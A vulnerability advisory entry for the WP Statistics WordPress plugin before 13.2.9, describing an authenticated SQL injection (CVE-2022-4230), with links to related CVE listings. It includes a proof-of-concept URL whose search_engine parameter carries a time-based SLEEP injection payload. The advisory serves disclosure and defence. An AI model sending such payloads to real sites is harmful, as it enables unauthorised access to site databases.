Lucene search
Jordy VersmissenWPEX-ID:A0E40CFD-B217-481C-8FC4-027A0A023312HistoryDec 27, 2022 - 12:00 a.m.
WP Statistics < 13.2.9 - Authenticated SQLi
2022-12-2700:00:00
Jordy Versmissen
311
wordpress
sql injection
authenticated
delayed request
security vulnerability
EPSS
0.001
Percentile
38.3%
The plugin does not escape a parameter, which could allow authenticated users to perform SQL Injection attacks. By default, the affected feature is available to users with the manage_options capability (admin+), however the plugin has a settings to allow low privilege users to access it as well.
Log in as a user allowed to View WP Statistic and get a nonce via https://example.com/wp-admin/admin-ajax.php?action=rest-nonce, and use it in the URL below, which will be delayed by 5s:
http://example.com/wp-json/wp-statistics/v2/metabox?_wpnonce=NONCE&name=words&search_engine=aaa%27%20AND%20(SELECT%205671%20FROM%20(SELECT(SLEEP(5)))Mdgs)--%20HsBR
Related
nvd
nvd
CVE-2022-4230
2023-01-23 15:15:14
cve
cve
CVE-2022-4230
2023-01-23 15:15:14
osv
osv
CVE-2022-4230
2023-01-23 15:15:14
cvelist
cvelist
CVE-2022-4230 WP Statistics < 13.2.9 - Authenticated SQLi
2023-01-23 14:31:43
openvas
openvas
WordPress WP Statistics Plugin < 13.2.9 SQLi Vulnerability
2023-01-24 00:00:00
prion
prion
Sql injection
2023-01-23 15:15:00
wpvulndb
wpvulndb
WP Statistics < 13.2.9 - Authenticated SQLi
2022-12-27 00:00:00